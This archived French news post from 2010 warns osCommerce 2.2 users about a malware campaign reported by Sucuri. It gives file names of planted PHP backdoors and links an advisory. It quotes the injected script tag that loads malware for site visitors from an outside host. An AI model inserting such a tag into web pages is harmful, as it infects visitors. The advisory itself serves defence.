osCommerce : un Malware circule

ARCHIVE

Si vous êtes un utilisateur de osCommerce, vous devriez vous assurer de mettre régulièrement à jour votre installation (et de vérifier vos sites) dès que possible. Apparemment, sucuri.net a en fait un malware qui s?est installé sur certains des sites qu?ils suivaient. Ce malware installe notamment le script suivant sur vos pages :

 

< script src = \"http://nt02.co.in/3\" >

 

Ce code est utilisé pour charger des logiciels malveillants pour les visiteurs de votre site,  sans qu?ils ne se méfient (comme tout bon malware digne de ce nom :) ) .  La plupart des sites touchés aurait également quelques fichiers PHP, insérés dans le dossier / images, généralement appelés inclasses.php, loadclasses.php ou phpclasses.php.

 

Sucuri sont encore en train de faire des recherches sur la façon dont ces sites ont été piratés et quelle  vulnérabilité a été utilisée.  Sucuri.net mentionne une faille précise (et déjà connue des éditeurs ), vous pouvez en avoir le détail ici : http://www.securityfocus.com/bid/40456

 

 



La version d\'osCommerce suspectée d\'être victime de la faille est la version Online Merchant 2.2.

Source : http://blog.sucuri.net/2010/07/oscommerce-users-update-your-installations-as-soon-as-possible.html